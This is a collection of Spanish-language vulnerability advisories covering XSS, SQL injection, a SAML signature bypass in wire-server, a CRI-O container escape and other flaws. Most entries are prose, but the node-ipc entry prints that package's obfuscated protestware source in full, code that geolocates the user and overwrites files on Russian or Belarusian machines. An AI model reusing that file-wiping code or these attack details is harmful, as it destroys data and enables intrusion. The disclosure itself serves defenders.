Vulnerabilidades

Se ha detectado que FISCO-BCOS versión 3.0.0-rc2, contiene un problema por el que un nodo malicioso, por medio de un paquete de cambio de visualización malicioso, causará que los nodos normales cambien de visualización excesivamente y dejen de generar bloques

Una vulnerabilidad de tipo cross-site scripting (XSS) almacenada en /ptms/?page=user de Online Project Time Management System versión v1.0, permite a atacantes ejecutar scripts web o HTML arbitrarios por medio de una carga útil diseñada inyectada en el campo user name

Se ha detectado que Online Project Time Management System versión v1.0, contiene una vulnerabilidad de inyección SQL por medio del parámetro id en la función save_employee en el archivo /ptms/classes/Users.php

wire-server proporciona servicios de back-end para Wire, un mensajero de código abierto. En versiones de wire-server anteriores a 27-01-2022, era posible diseñar firmas DSA para omitir el SSO de SAML y suplantar a cualquier usuario de Wire con credenciales SAML. En equipos con SAML, pero sin SCIM, era posible crear nuevas cuentas con credenciales SAML falsas. Bajo determinadas condiciones que pueden ser establecidas por un atacante, una biblioteca upstream para analizar, renderizar, firmar y comprobar datos XML de SAML aceptaba como confiables claves públicas que eran proporcionadas por el atacante en la firma. Como consecuencia, el atacante podía iniciar sesión como cualquier usuario en cualquier equipo de Wire con SAML SSO habilitado. Si SCIM no estaba habilitado, el atacante también podía crear nuevos usuarios con nuevos NameID de SAML. Para explotar esta vulnerabilidad, el atacante necesita conocer el código de inicio de sesión de SSO (distribuido a todos los miembros del equipo con credenciales SAML y visible en la aplicación de administración de equipos), el EntityID de SAML que identifica al IdP (una URL no considerada confidencial, pero normalmente difícil de adivinar, también visible en la administración de equipos) y el NameID de SAML del usuario (normalmente una dirección de correo electrónico o un nick). El problema ha sido solucionado en wire-server "27-01-2022" y ya está desplegado en todos los servicios gestionados de Wire. Las instancias locales de wire-server deben ser actualizadas a "27-01-2022", para que sus backends no estén afectados. Actualmente no se presentan medidas de mitigación conocidas. Se presenta información más detallada sobre cómo reproducir la vulnerabilidad y las estrategias de mitigación en el aviso de seguridad de GitHub

CKEditor4 es un editor HTML de código abierto "lo que visualizas es lo que obtienes". CKEditor4 versiones anteriores a 4.18.0, contiene una vulnerabilidad en el plugin "dialog". La vulnerabilidad permite abusar de una expresión regular del validador de entrada de diálogos, lo que puede causar una importante caída de rendimiento resultando en una congelación de la pestaña del navegador. Se presenta un parche disponible en versión 4.18.0. Actualmente no se conocen medidas de mitigación

En Xbtit versión 3.1, se presenta una vulnerabilidad de tipo cross-site scripting. La vulnerabilidad de tipo XSS almacenada es producida porque el archivo /ajaxchat/sendChatData.php no comprueba correctamente el valor del parámetro "n" (POST). Mediante esta vulnerabilidad, un atacante es capaz de ejecutar código JavaScript malicioso

El paquete node-lmdb versiones anteriores a 0.9.7, es vulnerable a una denegación de servicio (DoS) cuando es definido un valor ToString no invocable, lo que causará un fallo durante la comprobación de tipo

El paquete @braintree/sanitize-url versiones anteriores a 6.0.0 es vulnerable a un ataque de tipo Cross-site Scripting (XSS) debido a un saneo inapropiado en la función sanitizeUrl

CKEditor4 es un editor HTML de código abierto "lo que visualizas es lo que obtienes". Se ha detectado una vulnerabilidad en el módulo central de procesamiento de HTML y puede afectar a todos los plugins usados por CKEditor 4 versiones anteriores a 4.18.0. La vulnerabilidad permite que alguien inyecte HTML malformado omitiendo el saneo del contenido, lo que podría resultar en una ejecución de código JavaScript. Este problema ha sido parcheado en versión 4.18.0. Actualmente no se presentan medidas de mitigación conocidas

Esto afecta al paquete node-ipc a partir de la versión 10.1.1 y versiones anteriores a 10.1.3. Este paquete contiene un código malicioso, que es dirigido a usuarios con IP ubicadas en Rusia o Bielorrusia, y sobrescribe sus archivos con un emoji de corazón. **Nota**: a partir de las versiones 11.0.0, en lugar de tener código malicioso directamente en el código fuente de este paquete, node-ipc importa el paquete peacenotwar que incluye un comportamiento potencialmente no deseado. Código Malicioso: **Nota:** ¡No lo ejecutes! js importado desde "path"; importado desde "fs"; importado desde "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer. from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t. on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer. from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer. from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // comprueba si el país es Rusia o Bielorrusia if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a. readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u. join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // sobrescribe el archivo con ? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

Se presenta una vulnerabilidad de inyección SQL ciega en Xbtit versión 3.1, por medio del parámetro sid en el archivo ajaxchat/getHistoryChatData.php que es accesible por un usuario registrado. Como resultado, un usuario malicioso puede extraer datos confidenciales como nombres de usuario y contraseñas y, en algunos casos, usar esta vulnerabilidad para conseguir una ejecución de código remota en el servidor web remoto

Se ha encontrado un fallo en CRI-O en la forma de establecer las opciones del kernel para un pod. Este problema permite a cualquier persona con derechos desplegar un pod en un clúster Kubernetes que usa el tiempo de ejecución de CRI-O para lograr un escape del contenedor y la ejecución de código arbitrario como root en el nodo del clúster, donde fue desplegado el pod malicioso